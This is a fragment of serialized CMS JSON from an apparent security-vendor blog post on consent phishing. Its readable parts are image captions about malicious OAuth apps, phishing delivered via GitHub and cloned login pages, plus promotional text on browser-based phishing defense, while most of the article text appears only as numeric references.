alue":112158,"marks":130979,"data":130980},[],{},{"nodeType":312,"data":130982,"content":130985},{"target":130983},{"sys":130984},{"id":77578,"type":317,"linkType":318},[],{"nodeType":178,"data":130987,"content":130988},{},[130989],{"nodeType":173,"value":112170,"marks":130990,"data":130991},[],{},{"nodeType":178,"data":130993,"content":130994},{},[130995],{"nodeType":173,"value":112177,"marks":130996,"data":130997},[],{},{"nodeType":250,"data":130999,"content":131000},{},[131001,131010,131019,131028],{"nodeType":254,"data":131002,"content":131003},{},[131004],{"nodeType":178,"data":131005,"content":131006},{},[131007],{"nodeType":173,"value":112190,"marks":131008,"data":131009},[],{},{"nodeType":254,"data":131011,"content":131012},{},[131013],{"nodeType":178,"data":131014,"content":131015},{},[131016],{"nodeType":173,"value":112200,"marks":131017,"data":131018},[],{},{"nodeType":254,"data":131020,"content":131021},{},[131022],{"nodeType":178,"data":131023,"content":131024},{},[131025],{"nodeType":173,"value":112210,"marks":131026,"data":131027},[],{},{"nodeType":254,"data":131029,"content":131030},{},[131031],{"nodeType":178,"data":131032,"content":131033},{},[131034],{"nodeType":173,"value":112220,"marks":131035,"data":131036},[],{},{"nodeType":231,"data":131038,"content":131039},{},[],{"nodeType":169,"data":131041,"content":131042},{},[131043],{"nodeType":173,"value":112230,"marks":131044,"data":131046},[131045],{"type":370},{},{"nodeType":178,"data":131048,"content":131049},{},[131050],{"nodeType":173,"value":112238,"marks":131051,"data":131052},[],{},{"nodeType":231,"data":131054,"content":131055},{},[],{"nodeType":169,"data":131057,"content":131058},{},[131059],{"nodeType":173,"value":71801,"marks":131060,"data":131061},[],{},{"nodeType":178,"data":131063,"content":131064},{},[131065,131068,131075],{"nodeType":173,"value":112254,"marks":131066,"data":131067},[],{},{"nodeType":186,"data":131069,"content":131070},{"uri":473},[131071],{"nodeType":173,"value":2889,"marks":131072,"data":131074},[131073],{"type":194},{},{"nodeType":173,"value":1477,"marks":131076,"data":131077},[],{},{"items":131079},[131080,131082],{"sys":131081,"name":26137},{"id":26136},{"sys":131083,"name":505},{"id":504},{"items":131085},[131086],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":131087},{"url":2911},{"__typename":1528,"sys":131089,"content":131090,"title":122341,"synopsis":122342,"hashTags":118,"publishedDate":122343,"slug":122344,"tagsCollection":131750,"authorsCollection":131756},{"id":121579},{"json":131091},{"nodeType":165,"data":131092,"content":131093},{},[131094,131100,131130,131136,131152,131158,131161,131168,131174,131179,131185,131190,131195,131201,131217,131222,131228,131231,131238,131254,131275,131281,131288,131294,131300,131305,131312,131328,131344,131349,131355,131360,131367,131393,131398,131404,131407,131414,131420,131436,131442,131447,131454,131460,131466,131472,131478,131538,131544,131551,131566,131571,131577,131583,131588,131594,131599,131606,131612,131617,131622,131628,131631,131638,131664,131670,131686,131692,131702,131708,131711,131718,131734],{"nodeType":178,"data":131095,"content":131096},{},[131097],{"nodeType":173,"value":121588,"marks":131098,"data":131099},[],{},{"nodeType":250,"data":131101,"content":131102},{},[131103,131112,131121],{"nodeType":254,"data":131104,"content":131105},{},[131106],{"nodeType":178,"data":131107,"content":131108},{},[131109],{"nodeType":173,"value":121601,"marks":131110,"data":131111},[],{},{"nodeType":254,"data":131113,"content":131114},{},[131115],{"nodeType":178,"data":131116,"content":131117},{},[131118],{"nodeType":173,"value":121611,"marks":131119,"data":131120},[],{},{"nodeType":254,"data":131122,"content":131123},{},[131124],{"nodeType":178,"data":131125,"content":131126},{},[131127],{"nodeType":173,"value":121621,"marks":131128,"data":131129},[],{},{"nodeType":178,"data":131131,"content":131132},{},[131133],{"nodeType":173,"value":121628,"marks":131134,"data":131135},[],{},{"nodeType":178,"data":131137,"content":131138},{},[131139,131142,131149],{"nodeType":173,"value":121635,"marks":131140,"data":131141},[],{},{"nodeType":186,"data":131143,"content":131144},{"uri":121640},[131145],{"nodeType":173,"value":121643,"marks":131146,"data":131148},[131147],{"type":194},{},{"nodeType":173,"value":197,"marks":131150,"data":131151},[],{},{"nodeType":178,"data":131153,"content":131154},{},[131155],{"nodeType":173,"value":121654,"marks":131156,"data":131157},[],{},{"nodeType":231,"data":131159,"content":131160},{},[],{"nodeType":169,"data":131162,"content":131163},{},[131164],{"nodeType":173,"value":24096,"marks":131165,"data":131167},[131166],{"type":370},{},{"nodeType":178,"data":131169,"content":131170},{},[131171],{"nodeType":173,"value":121671,"marks":131172,"data":131173},[],{},{"nodeType":312,"data":131175,"content":131178},{"target":131176},{"sys":131177},{"id":121678,"type":317,"linkType":318},[],{"nodeType":178,"data":131180,"content":131181},{},[131182],{"nodeType":173,"value":121684,"marks":131183,"data":131184},[],{},{"nodeType":312,"data":131186,"content":131189},{"target":131187},{"sys":131188},{"id":121691,"type":317,"linkType":318},[],{"nodeType":312,"data":131191,"content":131194},{"target":131192},{"sys":131193},{"id":121697,"type":317,"linkType":318},[],{"nodeType":178,"data":131196,"content":131197},{},[131198],{"nodeType":173,"value":121703,"marks":131199,"data":131200},[],{},{"nodeType":178,"data":131202,"content":131203},{},[131204,131207,131214],{"nodeType":173,"value":121710,"marks":131205,"data":131206},[],{},{"nodeType":186,"data":131208,"content":131209},{"uri":832},[131210],{"nodeType":173,"value":4519,"marks":131211,"data":131213},[131212],{"type":194},{},{"nodeType":173,"value":53584,"marks":131215,"data":131216},[],{},{"nodeType":312,"data":131218,"content":131221},{"target":131219},{"sys":131220},{"id":121727,"type":317,"linkType":318},[],{"nodeType":178,"data":131223,"content":131224},{},[131225],{"nodeType":173,"value":121733,"marks":131226,"data":131227},[],{},{"nodeType":231,"data":131229,"content":131230},{},[],{"nodeType":169,"data":131232,"content":131233},{},[131234],{"nodeType":173,"value":121743,"marks":131235,"data":131237},[131236],{"type":370},{},{"nodeType":178,"data":131239,"content":131240},{},[131241,131244,131251],{"nodeType":173,"value":121751,"marks":131242,"data":131243},[],{},{"nodeType":186,"data":131245,"content":131246},{"uri":97747},[131247],{"nodeType":173,"value":121758,"marks":131248,"data":131250},[131249],{"type":194},{},{"nodeType":173,"value":121763,"marks":131252,"data":131253},[],{},{"nodeType":250,"data":131255,"content":131256},{},[131257,131266],{"nodeType":254,"data":131258,"content":131259},{},[131260],{"nodeType":178,"data":131261,"content":131262},{},[131263],{"nodeType":173,"value":121776,"marks":131264,"data":131265},[],{},{"nodeType":254,"data":131267,"content":131268},{},[131269],{"nodeType":178,"data":131270,"content":131271},{},[131272],{"nodeType":173,"value":121786,"marks":131273,"data":131274},[],{},{"nodeType":178,"data":131276,"content":131277},{},[131278],{"nodeType":173,"value":121793,"marks":131279,"data":131280},[],{},{"nodeType":235,"data":131282,"content":131283},{},[131284],{"nodeType":173,"value":121800,"marks":131285,"data":131287},[131286],{"type":370},{},{"nodeType":178,"data":131289,"content":131290},{},[131291],{"nodeType":173,"value":121808,"marks":131292,"data":131293},[],{},{"nodeType":178,"data":131295,"content":131296},{},[131297],{"nodeType":173,"value":121815,"marks":131298,"data":131299},[],{},{"nodeType":312,"data":131301,"content":131304},{"target":131302},{"sys":131303},{"id":121822,"type":317,"linkType":318},[],{"nodeType":235,"data":131306,"content":131307},{},[131308],{"nodeType":173,"value":121828,"marks":131309,"data":131311},[131310],{"type":370},{},{"nodeType":178,"data":131313,"content":131314},{},[131315,131318,131325],{"nodeType":173,"value":121836,"marks":131316,"data":131317},[],{},{"nodeType":186,"data":131319,"content":131320},{"uri":74693},[131321],{"nodeType":173,"value":121843,"marks":131322,"data":131324},[131323],{"type":194},{},{"nodeType":173,"value":121848,"marks":131326,"data":131327},[],{},{"nodeType":178,"data":131329,"content":131330},{},[131331,131334,131341],{"nodeType":173,"value":121855,"marks":131332,"data":131333},[],{},{"nodeType":186,"data":131335,"content":131336},{"uri":74693},[131337],{"nodeType":173,"value":121862,"marks":131338,"data":131340},[131339],{"type":194},{},{"nodeType":173,"value":121867,"marks":131342,"data":131343},[],{},{"nodeType":312,"data":131345,"content":131348},{"target":131346},{"sys":131347},{"id":121874,"type":317,"linkType":318},[],{"nodeType":178,"data":131350,"content":131351},{},[131352],{"nodeType":173,"value":121880,"marks":131353,"data":131354},[],{},{"nodeType":312,"data":131356,"content":131359},{"target":131357},{"sys":131358},{"id":121887,"type":317,"linkType":318},[],{"nodeType":235,"data":131361,"content":131362},{},[131363],{"nodeType":173,"value":121893,"marks":131364,"data":131366},[131365],{"type":370},{},{"nodeType":178,"data":131368,"content":131369},{},[131370,131373,131380,131383,131390],{"nodeType":173,"value":121901,"marks":131371,"data":131372},[],{},{"nodeType":186,"data":131374,"content":131375},{"uri":121906},[131376],{"nodeType":173,"value":121909,"marks":131377,"data":131379},[131378],{"type":194},{},{"nodeType":173,"value":121914,"marks":131381,"data":131382},[],{},{"nodeType":186,"data":131384,"content":131385},{"uri":88239},[131386],{"nodeType":173,"value":121921,"marks":131387,"data":131389},[131388],{"type":194},{},{"nodeType":173,"value":121926,"marks":131391,"data":131392},[],{},{"nodeType":312,"data":131394,"content":131397},{"target":131395},{"sys":131396},{"id":121933,"type":317,"linkType":318},[],{"nodeType":178,"data":131399,"content":131400},{},[131401],{"nodeType":173,"value":121939,"marks":131402,"data":131403},[],{},{"nodeType":231,"data":131405,"content":131406},{},[],{"nodeType":169,"data":131408,"content":131409},{},[131410],{"nodeType":173,"value":121949,"marks":131411,"data":131413},[131412],{"type":370},{},{"nodeType":178,"data":131415,"content":131416},{},[131417],{"nodeType":173,"value":121957,"marks":131418,"data":131419},[],{},{"nodeType":178,"data":131421,"content":131422},{},[131423,131426,131433],{"nodeType":173,"value":121964,"marks":131424,"data":131425},[],{},{"nodeType":186,"data":131427,"content":131428},{"uri":121969},[131429],{"nodeType":173,"value":121972,"marks":131430,"data":131432},[131431],{"type":194},{},{"nodeType":173,"value":121977,"marks":131434,"data":131435},[],{},{"nodeType":178,"data":131437,"content":131438},{},[131439],{"nodeType":173,"value":121984,"marks":131440,"data":131441},[],{},{"nodeType":312,"data":131443,"content":131446},{"target":131444},{"sys":131445},{"id":121991,"type":317,"linkType":318},[],{"nodeType":235,"data":131448,"content":131449},{},[131450],{"nodeType":173,"value":121997,"marks":131451,"data":131453},[131452],{"type":370},{},{"nodeType":178,"data":131455,"content":131456},{},[131457],{"nodeType":173,"value":122005,"marks":131458,"data":131459},[],{},{"nodeType":178,"data":131461,"content":131462},{},[131463],{"nodeType":173,"value":122012,"marks":131464,"data":131465},[],{},{"nodeType":178,"data":131467,"content":131468},{},[131469],{"nodeType":173,"value":122019,"marks":131470,"data":131471},[],{},{"nodeType":178,"data":131473,"content":131474},{},[131475],{"nodeType":173,"value":122026,"marks":131476,"data":131477},[],{},{"nodeType":250,"data":131479,"content":131480},{},[131481,131510,131529],{"nodeType":254,"data":131482,"content":131483},{},[131484],{"nodeType":178,"data":131485,"content":131486},{},[131487,131490,131497,131500,131507],{"nodeType":173,"value":122039,"marks":131488,"data":131489},[],{},{"nodeType":186,"data":131491,"content":131492},{"uri":819},[131493],{"nodeType":173,"value":27706,"marks":131494,"data":131496},[131495],{"type":194},{},{"nodeType":173,"value":122050,"marks":131498,"data":131499},[],{},{"nodeType":186,"data":131501,"content":131502},{"uri":27726},[131503],{"nodeType":173,"value":27729,"marks":131504,"data":131506},[131505],{"type":194},{},{"nodeType":173,"value":122061,"marks":131508,"data":131509},[],{},{"nodeType":254,"data":131511,"content":131512},{},[131513],{"nodeType":178,"data":131514,"content":131515},{},[131516,131519,131526],{"nodeType":173,"value":122071,"marks":131517,"data":131518},[],{},{"nodeType":186,"data":131520,"content":131521},{"uri":122076},[131522],{"nodeType":173,"value":122079,"marks":131523,"data":131525},[131524],{"type":194},{},{"nodeType":173,"value":122084,"marks":131527,"data":131528},[],{},{"nodeType":254,"data":131530,"content":131531},{},[131532],{"nodeType":178,"data":131533,"content":131534},{},[131535],{"nodeType":173,"value":122094,"marks":131536,"data":131537},[],{},{"nodeType":178,"data":131539,"content":131540},{},[131541],{"nodeType":173,"value":122101,"marks":131542,"data":131543},[],{},{"nodeType":235,"data":131545,"content":131546},{},[131547],{"nodeType":173,"value":122108,"marks":131548,"data":131550},[131549],{"type":370},{},{"nodeType":178,"data":131552,"content":131553},{},[131554,131557,131563],{"nodeType":173,"value":122116,"marks":131555,"data":131556},[],{},{"nodeType":186,"data":131558,"content":131559},{"uri":122121},[131560],{"nodeType":173,"value":122124,"marks":131561,"data":131562},[],{},{"nodeType":173,"value":122128,"marks":131564,"data":131565},[],{},{"nodeType":312,"data":131567,"content":131570},{"target":131568},{"sys":131569},{"id":122135,"type":317,"linkType":318},[],{"nodeType":178,"data":131572,"content":131573},{},[131574],{"nodeType":173,"value":122141,"marks":131575,"data":131576},[],{},{"nodeType":178,"data":131578,"content":131579},{},[131580],{"nodeType":173,"value":122148,"marks":131581,"data":131582},[],{},{"nodeType":312,"data":131584,"content":131587},{"target":131585},{"sys":131586},{"id":122155,"type":317,"linkType":318},[],{"nodeType":178,"data":131589,"content":131590},{},[131591],{"nodeType":173,"value":122161,"marks":131592,"data":131593},[],{},{"nodeType":312,"data":131595,"content":131598},{"target":131596},{"sys":131597},{"id":122168,"type":317,"linkType":318},[],{"nodeType":235,"data":131600,"content":131601},{},[131602],{"nodeType":173,"value":122174,"marks":131603,"data":131605},[131604],{"type":370},{},{"nodeType":178,"data":131607,"content":131608},{},[131609],{"nodeType":173,"value":122182,"marks":131610,"data":131611},[],{},{"nodeType":312,"data":131613,"content":131616},{"target":131614},{"sys":131615},{"id":122189,"type":317,"linkType":318},[],{"nodeType":312,"data":131618,"content":131621},{"target":131619},{"sys":131620},{"id":122195,"type":317,"linkType":318},[],{"nodeType":178,"data":131623,"content":131624},{},[131625],{"nodeType":173,"value":122201,"marks":131626,"data":131627},[],{},{"nodeType":231,"data":131629,"content":131630},{},[],{"nodeType":169,"data":131632,"content":131633},{},[131634],{"nodeType":173,"value":16139,"marks":131635,"data":131637},[131636],{"type":370},{},{"nodeType":178,"data":131639,"content":131640},{},[131641,131644,131651,131654,131661],{"nodeType":173,"value":122218,"marks":131642,"data":131643},[],{},{"nodeType":186,"data":131645,"content":131646},{"uri":88239},[131647],{"nodeType":173,"value":88245,"marks":131648,"data":131650},[131649],{"type":194},{},{"nodeType":173,"value":933,"marks":131652,"data":131653},[],{},{"nodeType":186,"data":131655,"content":131656},{"uri":122233},[131657],{"nodeType":173,"value":122236,"marks":131658,"data":131660},[131659],{"type":194},{},{"nodeType":173,"value":122241,"marks":131662,"data":131663},[],{},{"nodeType":178,"data":131665,"content":131666},{},[131667],{"nodeType":173,"value":122248,"marks":131668,"data":131669},[],{},{"nodeType":178,"data":131671,"content":131672},{},[131673,131676,131683],{"nodeType":173,"value":122255,"marks":131674,"data":131675},[],{},{"nodeType":186,"data":131677,"content":131678},{"uri":81621},[131679],{"nodeType":173,"value":122262,"marks":131680,"data":131682},[131681],{"type":194},{},{"nodeType":173,"value":122267,"marks":131684,"data":131685},[],{},{"nodeType":178,"data":131687,"content":131688},{},[131689],{"nodeType":173,"value":122274,"marks":131690,"data":131691},[],{},{"nodeType":3769,"data":131693,"content":131694},{},[131695],{"nodeType":178,"data":131696,"content":131697},{},[131698],{"nodeType":173,"value":122284,"marks":131699,"data":131701},[131700],{"type":370},{},{"nodeType":178,"data":131703,"content":131704},{},[131705],{"nodeType":173,"value":122292,"marks":131706,"data":131707},[],{},{"nodeType":231,"data":131709,"content":131710},{},[],{"nodeType":169,"data":131712,"content":131713},{},[131714],{"nodeType":173,"value":1422,"marks":131715,"data":131717},[131716],{"type":370},{},{"nodeType":178,"data":131719,"content":131720},{},[131721,131724,131731],{"nodeType":173,"value":122309,"marks":131722,"data":131723},[],{},{"nodeType":186,"data":131725,"content":131726},{"uri":122314},[131727],{"nodeType":173,"value":122317,"marks":131728,"data":131730},[131729],{"type":194},{},{"nodeType":173,"value":197,"marks":131732,"data":131733},[],{},{"nodeType":178,"data":131735,"content":131736},{},[131737,131740,131747],{"nodeType":173,"value":122328,"marks":131738,"data":131739},[],{},{"nodeType":186,"data":131741,"content":131742},{"uri":473},[131743],{"nodeType":173,"value":2889,"marks":131744,"data":131746},[131745],{"type":194},{},{"nodeType":173,"value":1477,"marks":131748,"data":131749},[],{},{"items":131751},[131752,131754],{"sys":131753,"name":505},{"id":504},{"sys":131755,"name":509},{"id":508},{"items":131757},[131758],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":131759},{"url":1496},{"items":131761},[131762],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":131763},{"url":1496},{"json":131765,"links":132144},{"data":131766,"content":131767,"nodeType":165},{},[131768,131794,131810,131816,131822,131825,131832,131838,131843,131848,131853,131859,131875,131880,131883,131890,131896,131902,131908,131913,131919,131925,131930,131936,131952,131957,131963,131966,131973,131979,131984,131990,132031,132036,132042,132045,132052,132058,132064,132069,132074,132079,132082,132089,132095,132100,132106,132112,132115,132122,132128],{"data":131769,"content":131770,"nodeType":178},{},[131771,131774,131781,131784,131791],{"data":131772,"marks":131773,"value":37,"nodeType":173},{},[],{"data":131775,"content":131776,"nodeType":186},{"uri":19838},[131777],{"data":131778,"marks":131779,"value":39940,"nodeType":173},{},[131780],{"type":194},{"data":131782,"marks":131783,"value":106716,"nodeType":173},{},[],{"data":131785,"content":131786,"nodeType":186},{"uri":106719},[131787],{"data":131788,"marks":131789,"value":88245,"nodeType":173},{},[131790],{"type":194},{"data":131792,"marks":131793,"value":106728,"nodeType":173},{},[],{"data":131795,"content":131796,"nodeType":178},{},[131797,131800,131807],{"data":131798,"marks":131799,"value":106735,"nodeType":173},{},[],{"data":131801,"content":131802,"nodeType":186},{"uri":106738},[131803],{"data":131804,"marks":131805,"value":106744,"nodeType":173},{},[131806],{"type":194},{"data":131808,"marks":131809,"value":106748,"nodeType":173},{},[],{"data":131811,"content":131812,"nodeType":178},{},[131813],{"data":131814,"marks":131815,"value":106755,"nodeType":173},{},[],{"data":131817,"content":131818,"nodeType":178},{},[131819],{"data":131820,"marks":131821,"value":106762,"nodeType":173},{},[],{"data":131823,"content":131824,"nodeType":231},{},[],{"data":131826,"content":131827,"nodeType":169},{},[131828],{"data":131829,"marks":131830,"value":106773,"nodeType":173},{},[131831],{"type":370},{"data":131833,"content":131834,"nodeType":178},{},[131835],{"data":131836,"marks":131837,"value":106780,"nodeType":173},{},[],{"data":131839,"content":131842,"nodeType":312},{"target":131840},{"sys":131841},{"id":106785,"type":317,"linkType":318},[],{"data":131844,"content":131847,"nodeType":312},{"target":131845},{"sys":131846},{"id":106791,"type":317,"linkType":318},[],{"data":131849,"content":131852,"nodeType":312},{"target":131850},{"sys":131851},{"id":106797,"type":317,"linkType":318},[],{"data":131854,"content":131855,"nodeType":178},{},[131856],{"data":131857,"marks":131858,"value":106805,"nodeType":173},{},[],{"data":131860,"content":131861,"nodeType":178},{},[131862,131865,131872],{"data":131863,"marks":131864,"value":106812,"nodeType":173},{},[],{"data":131866,"content":131867,"nodeType":186},{"uri":106815},[131868],{"data":131869,"marks":131870,"value":106821,"nodeType":173},{},[131871],{"type":194},{"data":131873,"marks":131874,"value":106825,"nodeType":173},{},[],{"data":131876,"content":131879,"nodeType":312},{"target":131877},{"sys":131878},{"id":106830,"type":317,"linkType":318},[],{"data":131881,"content":131882,"nodeType":231},{},[],{"data":131884,"content":131885,"nodeType":169},{},[131886],{"data":131887,"marks":131888,"value":106842,"nodeType":173},{},[131889],{"type":370},{"data":131891,"content":131892,"nodeType":178},{},[131893],{"data":131894,"marks":131895,"value":106849,"nodeType":173},{},[],{"data":131897,"content":131898,"nodeType":178},{},[131899],{"data":131900,"marks":131901,"value":106856,"nodeType":173},{},[],{"data":131903,"content":131904,"nodeType":178},{},[131905],{"data":131906,"marks":131907,"value":106863,"nodeType":173},{},[],{"data":131909,"content":131912,"nodeType":312},{"target":131910},{"sys":131911},{"id":106868,"type":317,"linkType":318},[],{"data":131914,"content":131915,"nodeType":178},{},[131916],{"data":131917,"marks":131918,"value":106876,"nodeType":173},{},[],{"data":131920,"content":131921,"nodeType":178},{},[131922],{"data":131923,"marks":131924,"value":106883,"nodeType":173},{},[],{"data":131926,"content":131929,"nodeType":312},{"target":131927},{"sys":131928},{"id":106888,"type":317,"linkType":318},[],{"data":131931,"content":131932,"nodeType":178},{},[131933],{"data":131934,"marks":131935,"value":106896,"nodeType":173},{},[],{"data":131937,"content":131938,"nodeType":178},{},[131939,131942,131949],{"data":131940,"marks":131941,"value":106903,"nodeType":173},{},[],{"data":131943,"content":131944,"nodeType":186},{"uri":74693},[131945],{"data":131946,"marks":131947,"value":70035,"nodeType":173},{},[131948],{"type":194},{"data":131950,"marks":131951,"value":106914,"nodeType":173},{},[],{"data":131953,"content":131956,"nodeType":312},{"target":131954},{"sys":131955},{"id":69500,"type":317,"linkType":318},[],{"data":131958,"content":131959,"nodeType":178},{},[131960],{"data":131961,"marks":131962,"value":106926,"nodeType":173},{},[],{"data":131964,"content":131965,"nodeType":231},{},[],{"data":131967,"content":131968,"nodeType":169},{},[131969],{"data":131970,"marks":131971,"value":106937,"nodeType":173},{},[131972],{"type":370},{"data":131974,"content":131975,"nodeType":178},{},[131976],{"data":131977,"marks":131978,"value":106944,"nodeType":173},{},[],{"data":131980,"content":131983,"nodeType":312},{"target":131981},{"sys":131982},{"id":106949,"type":317,"linkType":318},[],{"data":131985,"content":131986,"nodeType":178},{},[131987],{"data":131988,"marks":131989,"value":106957,"nodeType":173},{},[],{"data":131991,"content":131992,"nodeType":250},{},[131993,132012],{"data":131994,"content":131995,"nodeType":254},{},[131996],{"data":131997,"content":131998,"nodeType":178},{},[131999,132002,132009],{"data":132000,"marks":132001,"value":37,"nodeType":173},{},[],{"data":132003,"content":132004,"nodeType":186},{"uri":74693},[132005],{"data":132006,"marks":132007,"value":106977,"nodeType":173},{},[132008],{"type":194},{"data":132010,"marks":132011,"value":106981,"nodeType":173},{},[],{"data":132013,"content":132014,"nodeType":254},{},[132015],{"data":132016,"content":132017,"nodeType":178},{},[132018,132021,132028],{"data":132019,"marks":132020,"value":37,"nodeType":173},{},[],{"data":132022,"content":132023,"nodeType":186},{"uri":97747},[132024],{"data":132025,"marks":132026,"value":106998,"nodeType":173},{},[132027],{"type":194},{"data":132029,"marks":132030,"value":107002,"nodeType":173},{},[],{"data":132032,"content":132035,"nodeType":312},{"target":132033},{"sys":132034},{"id":107007,"type":317,"linkType":318},[],{"data":132037,"content":132038,"nodeType":178},{},[132039],{"data":132040,"marks":132041,"value":107015,"nodeType":173},{},[],{"data":132043,"content":132044,"nodeType":231},{},[],{"data":132046,"content":132047,"nodeType":169},{},[132048],{"data":132049,"marks":132050,"value":107026,"nodeType":173},{},[132051],{"type":370},{"data":132053,"content":132054,"nodeType":178},{},[132055],{"data":132056,"marks":132057,"value":107033,"nodeType":173},{},[],{"data":132059,"content":132060,"nodeType":178},{},[132061],{"data":132062,"marks":132063,"value":107040,"nodeType":173},{},[],{"data":132065,"content":132068,"nodeType":312},{"target":132066},{"sys":132067},{"id":107045,"type":317,"linkType":318},[],{"data":132070,"content":132073,"nodeType":312},{"target":132071},{"sys":132072},{"id":98287,"type":317,"linkType":318},[],{"data":132075,"content":132078,"nodeType":312},{"target":132076},{"sys":132077},{"id":107056,"type":317,"linkType":318},[],{"data":132080,"content":132081,"nodeType":231},{},[],{"data":132083,"content":132084,"nodeType":169},{},[132085],{"data":132086,"marks":132087,"value":107068,"nodeType":173},{},[132088],{"type":370},{"data":132090,"content":132091,"nodeType":178},{},[132092],{"data":132093,"marks":132094,"value":107075,"nodeType":173},{},[],{"data":132096,"content":132099,"nodeType":312},{"target":132097},{"sys":132098},{"id":107080,"type":317,"linkType":318},[],{"data":132101,"content":132102,"nodeType":178},{},[132103],{"data":132104,"marks":132105,"value":107088,"nodeType":173},{},[],{"data":132107,"content":132108,"nodeType":178},{},[132109],{"data":132110,"marks":132111,"value":107095,"nodeType":173},{},[],{"data":132113,"content":132114,"nodeType":231},{},[],{"data":132116,"content":132117,"nodeType":169},{},[132118],{"data":132119,"marks":132120,"value":461,"nodeType":173},{},[132121],{"type":370},{"data":132123,"content":132124,"nodeType":178},{},[132125],{"data":132126,"marks":132127,"value":98309,"nodeType":173},{},[],{"data":132129,"content":132130,"nodeType":178},{},[132131,132134,132141],{"data":132132,"marks":132133,"value":61741,"nodeType":173},{},[],{"data":132135,"content":132136,"nodeType":186},{"uri":77659},[132137],{"data":132138,"marks":132139,"value":476,"nodeType":173},{},[132140],{"type":194},{"data":132142,"marks":132143,"value":69758,"nodeType":173},{},[],{"entries":132145},{"hyperlink":132146,"inline":132147,"block":132148},[],[],[132149,132157,132165,132172,132175,132183,132190,132193,132200,132206,132214,132217,132239],{"sys":132150,"__typename":5345,"title":132151,"caption":132152,"layoutMode":118,"file":132153},{"id":106785},"Consent phishing blog image 1","Initial notification in GitHub repo",{"url":132154,"width":132155,"height":132156},"https://images.ctfassets.net/y1cdw1ablpvd/45AWiiVZDMMx4wkVeh4OmH/e043c8d9975ad87c354c60ed2b95f3d8/image11_1.png",1145,520,{"sys":132158,"__typename":5345,"title":132159,"caption":132160,"layoutMode":118,"file":132161},{"id":106791},"Consent phishing image 2","Phishing message delivered via GitHub",{"url":132162,"width":132163,"height":132164},"https://images.ctfassets.net/y1cdw1ablpvd/5SF3XeGhHBxwDX8WamgdOI/66abad1b2770344e360c276c33528129/image_506.png",1372,1045,{"sys":132166,"__typename":5345,"title":132167,"caption":132168,"layoutMode":118,"file":132169},{"id":106797},"Consent phishing image 3","Consent phishing authorization page connecting the victim's GitHub account to the malicious app",{"url":132170,"width":11967,"height":132171},"https://images.ctfassets.net/y1cdw1ablpvd/2NfxL5bELb1XbET7MubvGN/e47630f6d0a3c85c3f2c567c4e443a0c/image1.png",1065,{"sys":132173,"__typename":15269,"type":15270,"ctaText":132174,"buttonLabel":123357,"buttonColour":15273,"buttonUrl":122314},{"id":106830},"Learn why phishing prevention needs to move beyond email to stop modern attacks taking place inside apps, IM platforms, via malvertising, and on social media.",{"sys":132176,"__typename":5345,"title":132177,"caption":132178,"layoutMode":118,"file":132179},{"id":106868},"Consent phishing image 4","Phishing email prompting the user to reset their password",{"url":132180,"width":132181,"height":132182},"https://images.ctfassets.net/y1cdw1ablpvd/7z6EOVPvvj2gxyafDubSEa/fc4ad4cd51af2da38478313fe991f445/Group_524.png",997,544,{"sys":132184,"__typename":5345,"title":132185,"caption":132186,"layoutMode":118,"file":132187},{"id":106888},"Consent phishing image 5","OAuth apps impersonating Adobe and DocuSign",{"url":132188,"width":11967,"height":132189},"https://images.ctfassets.net/y1cdw1ablpvd/maxSjZ6EyNf0ZL9tgcUBU/3d6da51a409fd1273b576ebc9b132703/image2.png",629,{"sys":132191,"__typename":5345,"title":129866,"caption":129867,"layoutMode":118,"file":132192},{"id":69500},{"url":123320,"width":123321,"height":123322},{"sys":132194,"__typename":5345,"title":132195,"caption":132196,"layoutMode":118,"file":132197},{"id":106949},"Consent phishing image 8","Summary of the attack path",{"url":132198,"width":121106,"height":132199},"https://images.ctfassets.net/y1cdw1ablpvd/6aWw8YdAR2WFHvFlTeshsQ/76236f4031c3d921cd1cd00887ce0e90/Slide_16_9_-_110.png",649,{"sys":132201,"__typename":5345,"title":132202,"caption":132202,"layoutMode":118,"file":132203},{"id":107007},"Comparing a legitimate page’s DOM structure with an attacker’s cloned page",{"url":132204,"width":132205,"height":19669},"https://images.ctfassets.net/y1cdw1ablpvd/4HmklQ1H0YIMlNdTkZR8B0/e2e727d9d96867b9d46e35bf097f7a0f/6.png",1875,{"sys":132207,"__typename":5345,"title":132208,"caption":132209,"layoutMode":118,"file":132210},{"id":107045},"How Push stops phishing attacks","Push detects and intercepts phishing attackers in the browser when the victim tries to load the page. ",{"url":132211,"width":132212,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/2CPV9LSQGHdFgmTxyF1c6s/c1ddb7eb7352ad7a161e447a8fa400e6/image1.png",1535,764,{"sys":132215,"__typename":5345,"title":121096,"caption":121097,"layoutMode":118,"file":132216},{"id":98287},{"url":121099,"width":23880,"height":19654},{"sys":132218,"__typename":5311,"content":132219,"name":132238,"title":118},{"id":107056},{"json":132220},{"nodeType":165,"data":132221,"content":132222},{},[132223,132230],{"nodeType":178,"data":132224,"content":132225},{},[132226],{"nodeType":173,"value":132227,"marks":132228,"data":132229},"By fingerprinting the password for your most important accounts used to log into IdPs like Microsoft, Google, Okta, etc. Push can prevent users from entering this password into any other page. So for example, if the user attempts to enter their real Microsoft password onto a phishing page, Push detects and intercepts it, blocking the phishing attempt. ",[],{},{"nodeType":178,"data":132231,"content":132232},{},[132233],{"nodeType":173,"value":132234,"marks":132235,"data":132237},"You can’t phish a victim if they can’t enter their credentials into your phishing site!",[132236],{"type":370},{},"Consent phishing blog insight box 1",{"sys":132240,"__typename":5345,"title":132241,"caption":132242,"layoutMode":118,"file":132243},{"id":107080},"Consent phishing blog image 7","Using Push to analyze and manage OAuth integrations detected in your environment. 